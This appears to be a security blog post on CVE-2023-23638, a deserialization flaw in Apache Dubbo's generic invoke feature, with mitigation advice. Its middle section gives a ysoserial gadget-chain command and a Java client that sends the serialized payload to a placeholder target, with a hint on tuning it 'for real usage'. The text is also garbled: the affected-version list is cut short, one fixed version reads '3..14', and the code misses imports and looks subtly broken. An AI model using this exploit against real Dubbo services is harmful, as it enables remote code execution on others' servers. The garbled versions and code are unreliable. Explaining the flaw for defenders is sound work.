In early 2023, security researchers flagged a critical vulnerability—CVE-2023-23638—in Apache Dubbo, a popular Java RPC framework. This flaw is a classic deserialization issue but packed inside Dubbo’s generic invocation feature, making it both relevant and dangerous to those running microservice environments.
In this post, you’ll learn what CVE-2023-23638 is, who’s at risk, how an attacker might exploit it, and see a code snippet in action. We keep it simple and practical.
What Is Dubbo’s Generic Invoke?
Dubbo’s *generic invoke* lets you call any method on any service, even when you don’t have the interface on the client at compile time. This is super useful for admin tools, but it comes at a risk: it often involves serialization and deserialization of untrusted data.
The Vulnerability
CVE-2023-23638 is a *deserialization vulnerability* that lurks in the way Dubbo parses and executes generic invocations. If a service exposes the generic invoke feature (either purposely or by default), a remote user can send a specially crafted payload that, when deserialized, results in arbitrary code execution on the server.
Apache Dubbo 3.1.x: *3.1.5 and earlier*
If your project uses any of these—Update Now!
How the Exploit Works
Dubbo supports several serialization formats (like Hessian2, Java serialization, etc). When an attacker finds an endpoint that supports *generic invocation*, they can send untrusted serialized Java objects. If the input is not sanitized, deserializing this data can instantiate attacker-supplied classes and run malicious code.
1. Attacker Sends Malicious Request
Suppose the attacker crafts a payload with a Java object known to trigger code execution during deserialization (e.g. using gadgets from *commons-collections*).
2. Exploit Payload (Pseudocode)
Here’s an example using the ysoserial tool to create a gadget chain payload.
First, generate a serialized payload
java -jar ysoserial.jar CommonsCollections6 'touch /tmp/hacked' > payload.bin
Now, send this payload to the susceptible Dubbo service, using e.g. a script or a custom Dubbo client.
Here’s simple Java code for an attacker to send the payload to a vulnerable Dubbo instance
import org.apache.dubbo.rpc.service.GenericService;
import org.apache.dubbo.config.ApplicationConfig;
import org.apache.dubbo.config.ReferenceConfig;
public class DubboExploit {
public static void main(String[] args) throws Exception {
ApplicationConfig app = new ApplicationConfig();
ReferenceConfig<GenericService> ref = new ReferenceConfig<>();
ref.setApplication(app);
ref.setInterface("com.example.Service"); // Target interface
ref.setGeneric("true"); // Enable generic invoke
ref.setUrl("dubbo://TARGET_IP:PORT");
GenericService genericService = ref.get();
// Load the malicious serialized object
byte[] evilPayload = Files.readAllBytes(Paths.get("payload.bin"));
// Over-genericized params may slip by service-side checks
Object result = genericService.$invoke("methodName",
new String[]{"java.lang.Object"},
new Object[]{evilPayload});
System.out.println("Result: " + result);
}
}
Note: For real usage, attackers would align the $invoke parameters, serialization type, and exploit chains according to the service.
Update Now!
- Dubbo fixed this in 2.7.22, 3..14, and 3.1.6.
Disable generic mode in production unless critically needed.
Restrict network access to only trusted clients.
References
- Apache Dubbo Security Announcement
- Dubbo CVE-2023-23638 at NVD
- GitHub Issue / Patch Discussion
- ysoserial Exploit Tools
Final Words
CVE-2023-23638 is a classic reminder that deserialization risks are everywhere, especially in systems catering to *generic* or *pluggable* extensions. If you use Apache Dubbo and haven’t updated to the latest version, your system is wide open to attack.
Always apply security patches and lock down generic features where you can!
Want more security breakdowns in plain English? Stay tuned.
Timeline
Published on: 03/08/2023 11:15:00 UTC
Last modified on: 03/14/2023 17:57:00 UTC